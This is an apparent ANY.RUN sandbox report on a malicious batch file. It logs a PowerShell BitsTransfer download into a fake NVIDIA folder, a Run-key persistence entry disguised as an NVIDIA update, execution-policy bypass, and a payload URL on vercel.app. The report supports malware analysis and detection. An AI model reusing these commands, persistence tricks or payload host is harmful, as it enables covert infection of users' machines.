File name: final.bat

Full analysis: https://app.any.run/tasks/c1a43f25-bc9c-40a0-a061-88088e2ec392
Verdict: Malicious activity
Analysis date: June 03, 2025, 05:45:06
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5: FDC36DE62917345F78CF5873833E309C
SHA1: 9B49476BA3A2DA41DF9420979F2A0187BA7EB761
SHA256: 13F789F8A222A84BA892CD88EF1485D7B6A166C58A2177A93FEB85A545F61566
SSDEEP: 24:6qKA8Ljsj9tkoQCLoQUBq25C7X4ON12inH/e8VQFqQtY/:NwkL2q25CAiHm8Ck

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Probably downloads file via BitsAdmin

      • powershell.exe (PID: 5568)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 4976)
    • Probably downloads file via BitsAdmin (POWERSHELL)

      • powershell.exe (PID: 4976)
    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 6564)
      • wscript.exe (PID: 7952)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 7584)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5772)
      • wscript.exe (PID: 6564)
      • wscript.exe (PID: 7952)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 5772)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 7288)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7928)
    • The process executes VB scripts

      • cmd.exe (PID: 5772)
    • The process executes Powershell scripts

      • wscript.exe (PID: 6564)
      • wscript.exe (PID: 7952)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 7584)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6564)
    • Uses TASKKILL.EXE to kill process

      • powershell.exe (PID: 7584)
  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4976)
      • powershell.exe (PID: 7288)
    • Disables trace logs

      • powershell.exe (PID: 7928)
    • Checks proxy server information

      • powershell.exe (PID: 7928)
      • slui.exe (PID: 900)
    • Changes the registry key values via Powershell

      • cmd.exe (PID: 5772)
    • Manual execution by a user

      • wscript.exe (PID: 7952)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7584)
      • powershell.exe (PID: 6644)
    • Reads the software policy settings

      • slui.exe (PID: 900)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 153
Monitored processes: 27
Malicious processes: 2
Suspicious processes: 6

Behavior graph

Process nodes in display order (entries marked "no specs" carry no indicators):
start, cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), powershell.exe (no specs), powershell.exe (no specs), powershell.exe (no specs), powershell.exe (no specs), powershell.exe, powershell.exe (no specs), wscript.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), wscript.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), taskkill.exe (no specs), taskkill.exe (no specs), addinprocess32.exe (no specs) x10, slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 32
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 236
CMD: taskkill /IM 7952 /F
Path: C:\Windows\System32\taskkill.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 240
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 404
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 900
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3168
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 4424
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4976
CMD: powershell -Command "Start-BitsTransfer -Source **** -Destination 'C:\Users\admin\AppData\Roaming\nvidia_sys\logs\secound.txt'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 5056
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 5552
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events: 38 140
Read events: 38 139
Write events: 1
Delete events: 0

Modification events

(PID) Process: (7800) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: NVIDIA_Update
Value: wscript.exe "C:\Users\admin\AppData\Roaming\nvidia_sys\logs\s-nvs_update.vbs"
Executable files: 0
Suspicious files: 1
Text files: 18
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 4976
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pashbuk4.a02.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6476
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cxbgxtlb.jpm.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4976
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_poayi5qj.1wf.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6476
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: E643B6FB46ABCE5E7B56C6DCB4A7A232
SHA256: 4EB0007C81D33BFF20C4BEBC3BB6A8F260CDBD9CA7A5B3783087317A78D6E994

PID: 5568
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tubbrkve.0wb.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7928
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_n4bvbada.qxx.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7928
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cluzuuyh.f1w.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7288
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_grbips2a.bgx.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7288
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4tnl0wb3.5m3.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6476
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hxdueuht.ho5.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 30
TCP/UDP connections: 50
DNS requests: 22
Threats: 3

HTTP requests

Columns: PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation ("-" marks an empty cell)

4164 | svchost.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | - | - | whitelisted
- | - | POST | 200 | 20.190.160.17:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | whitelisted
- | - | POST | 200 | 20.190.160.17:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | whitelisted
- | - | POST | 200 | 20.190.159.2:443 | https://login.live.com/RST2.srf | unknown | xml | 11.0 Kb | whitelisted
4164 | svchost.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | POST | 200 | 40.126.31.3:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | whitelisted
- | - | POST | 200 | 20.190.159.73:443 | https://login.live.com/RST2.srf | unknown | xml | 11.0 Kb | whitelisted
- | - | HEAD | 200 | 216.198.79.193:443 | https://service-omega-snowy.vercel.app/final.txt | unknown | - | - | -
- | - | GET | 200 | 64.29.17.193:443 | https://service-omega-snowy.vercel.app/final.txt | unknown | text | 606 b | -

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation ("-" marks an empty cell)

4164 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
6544 | svchost.exe | 20.190.160.14:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
4164 | svchost.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
3812 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
4164 | svchost.exe | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
login.live.com
  • 20.190.160.14
  • 20.190.160.20
  • 40.126.32.68
  • 20.190.160.22
  • 20.190.160.131
  • 40.126.32.138
  • 40.126.32.140
  • 20.190.160.3
whitelisted
google.com
  • 142.250.74.206
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
  • 2.20.245.137
  • 2.20.245.139
whitelisted
www.microsoft.com
  • 2.23.181.156
  • 2.23.246.101
whitelisted
service-omega-snowy.vercel.app
  • 216.198.79.193
  • 64.29.17.193
unknown
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

Columns: PID | Process | Class | Message ("-" marks an empty cell)

2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Cloud infrastructure to build app (vercel .app)
- | - | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
- | - | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell
No debug info